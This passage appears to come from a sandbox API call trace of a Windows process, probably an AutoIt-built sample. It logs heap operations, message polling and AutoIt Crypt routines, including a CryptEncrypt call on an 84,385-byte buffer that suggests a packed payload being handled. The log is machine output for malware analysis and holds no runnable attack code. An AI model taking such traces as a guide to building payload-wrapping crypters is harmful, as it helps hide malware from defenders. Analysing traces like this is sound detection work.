hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0038.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.295] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0038.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.295] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0038.296] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.296] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.296] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da328, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da328*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.296] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.296] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.296] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.296] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.296] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.296] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.296] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.296] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.296] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0038.296] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.297] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.297] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.297] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.297] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.297] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.297] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.297] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.297] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0038.297] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.297] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.297] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.297] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.297] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.297] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0038.297] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.298] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.298] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x14996, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x149a0) returned 1 [0038.298] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.298] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.298] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.298] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.298] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.298] CharLowerBuffW (in: lpsz="byte[84385]", cchLength=0xb | out: lpsz="byte[84385]") returned 0xb [0038.298] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.301] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.301] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.301] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.303] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95e348*, pdwDataLen=0x6ae220*=0x14996, dwBufLen=0x149a0 | out: pbData=0x95e348*, pdwDataLen=0x6ae220*=0x149a0) returned 1 [0038.303] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.303] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.303] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.304] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.306] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.306] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.306] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.306] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.306] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.306] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.307] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.307] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.307] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.307] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.307] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.307] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.307] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0038.307] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.315] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.315] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0038.315] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.321] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.321] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.321] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.321] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.321] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.321] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0038.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.321] CryptDestroyKey (hKey=0x7c2280) returned 1 [0038.321] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.321] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.321] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.322] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.322] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.322] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.322] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0038.322] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.322] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.322] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0038.322] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.322] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.322] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.322] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.322] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.322] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.322] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0038.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.323] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.323] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.323] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.323] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.323] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.323] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.323] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.323] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.323] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.323] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.323] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0038.323] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.323] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, 